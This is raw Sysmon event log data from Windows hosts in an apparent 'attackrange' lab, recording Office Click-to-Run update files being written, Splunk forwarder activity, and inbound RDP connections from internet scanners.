11241100x800000000000000064705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEES.DLL2021-04-20 14:54:18.424 11241100x800000000000000064704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSAIN.DLL2021-04-20 14:54:18.424 11241100x800000000000000064703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ACEINTL.DLL2021-04-20 14:54:18.424 11241100x800000000000000064702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ACEWSTR.DLL2021-04-20 14:54:18.424 11241100x800000000000000064701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\vcruntime140.dll2021-04-20 14:54:18.424 11241100x800000000000000064700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\vccorlib140.dll2021-04-20 14:54:18.424 11241100x800000000000000064699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\msvcp140.dll2021-04-20 14:54:18.424 11241100x800000000000000064698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\UCRTBASE.DLL2021-04-20 14:54:18.424 11241100x800000000000000064697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-private-l1-1-0.dll2021-04-20 14:54:18.424 11241100x800000000000000064696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-utility-l1-1-0.dll2021-04-20 14:54:18.424 11241100x800000000000000064695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-time-l1-1-0.dll2021-04-20 14:54:18.424 11241100x800000000000000064694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-string-l1-1-0.dll2021-04-20 14:54:18.424 11241100x800000000000000064693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-stdio-l1-1-0.dll2021-04-20 14:54:18.424 11241100x800000000000000064692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\concrt140.dll2021-04-20 14:54:18.424 11241100x800000000000000064691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-runtime-l1-1-0.dll2021-04-20 14:54:18.424 11241100x800000000000000064690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-multibyte-l1-1-0.dll2021-04-20 14:54:18.424 11241100x800000000000000064689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-math-l1-1-0.dll2021-04-20 14:54:18.424 11241100x800000000000000064688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-core-timezone-l1-1-0.dll2021-04-20 14:54:18.424 11241100x800000000000000064687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ACEDAO.DLL2021-04-20 14:54:18.424 11241100x800000000000000064686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-conio-l1-1-0.dll2021-04-20 14:54:18.424 11241100x800000000000000064685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PerfBoost.exe2021-04-20 14:54:18.409 11241100x800000000000000064684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.424{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-heap-l1-1-0.dll2021-04-20 14:54:18.409 11241100x800000000000000064683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-locale-l1-1-0.dll2021-04-20 14:54:18.409 11241100x800000000000000064682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-filesystem-l1-1-0.dll2021-04-20 14:54:18.409 11241100x800000000000000064681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-environment-l1-1-0.dll2021-04-20 14:54:18.409 11241100x800000000000000064680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-convert-l1-1-0.dll2021-04-20 14:54:18.409 11241100x800000000000000064679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-core-synch-l1-2-0.dll2021-04-20 14:54:18.409 11241100x800000000000000064678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\api-ms-win-crt-process-l1-1-0.dll2021-04-20 14:54:18.409 354300x800000000000000064677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:17.086{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-32035-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:16.199{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57484-false10.0.1.12-8000- 11241100x800000000000000064675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\misc.exe2021-04-20 14:54:18.331 11241100x800000000000000064674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.315{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\msouc.exe2021-04-20 14:54:18.315 11241100x800000000000000064673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.315{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\ohub32.exe2021-04-20 14:54:18.315 23542300x800000000000000064672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:18.299{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=983BA062BE09B49F1E92882AF0809A8E,SHA256=A94A6D64B58B34DDC76598F9BA8CD7210546CBF145F77ADBDE7881A50CC5A107,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\osmadminicon.exe2021-04-20 14:54:18.299 11241100x800000000000000064670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\osmclienticon.exe2021-04-20 14:54:18.299 11241100x800000000000000064669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\outicon.exe2021-04-20 14:54:18.299 11241100x800000000000000064668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CHART.DLL2021-04-20 14:54:18.299 11241100x800000000000000064667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\vcruntime140_1.dll2021-04-20 14:54:18.221 11241100x800000000000000064666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\WINWORD.EXE2021-04-20 14:54:18.221 11241100x800000000000000064665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.143{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\XLLEX.DLL2021-04-20 14:54:18.143 11241100x800000000000000064664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.128{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\XLSLICER.DLL2021-04-20 14:54:18.128 11241100x800000000000000064663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.096{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ospintl.dll2021-04-20 14:54:18.096 11241100x800000000000000064662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.081{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Mso20win32client.dll2021-04-20 14:54:18.081 11241100x800000000000000064661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Wordconv.exe2021-04-20 14:54:18.065 11241100x800000000000000064660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SELFCERT.EXE2021-04-20 14:54:18.065 11241100x800000000000000064659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\CLVWINTL.DLL2021-04-20 14:54:18.065 23542300x800000000000000049488Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:18.807{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=263CD24289C976F91A8304E031720729,SHA256=1AE552532F3EE2FB0DA32E73E153C825F15F526BC5D6E3816686A42E612032DA,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000064658Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.049{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\GRINTL32.DLL2021-04-20 14:54:18.049 11241100x800000000000000064657Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.034{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe2021-04-20 14:54:18.034 11241100x800000000000000064656Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSSRINTL.DLL2021-04-20 14:54:18.018 11241100x800000000000000064655Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\SETLANG.EXE2021-04-20 14:54:18.018 11241100x800000000000000064654Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:18.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\MSOUC.EXE2021-04-20 14:54:18.018 11241100x800000000000000064653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:18.018{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ACCOLKI.DLL2021-04-20 14:54:18.018 23542300x800000000000000049487Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:18.510{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4AE82070D98659EA5D96C3D634899F23,SHA256=66317DB765748EFB7E65198B195E883DED069DDE1AA31E44B872F868DCC0BE79,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049486Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:16.759{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52483-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049485Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:16.662{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com58865-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049484Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:15.700{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62061-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 11241100x800000000000000064769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-core-synch-l1-2-0.dll2021-04-20 14:54:19.752 11241100x800000000000000064768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\odffilt.dll2021-04-20 14:54:19.752 11241100x800000000000000064767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\msvcr120.dll2021-04-20 14:54:19.752 11241100x800000000000000064766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.674{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ONBttnOL.dll2021-04-20 14:54:19.674 11241100x800000000000000064765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:19.659{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\msvcp140.dll2021-04-20 14:54:19.659 11241100x800000000000000064764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 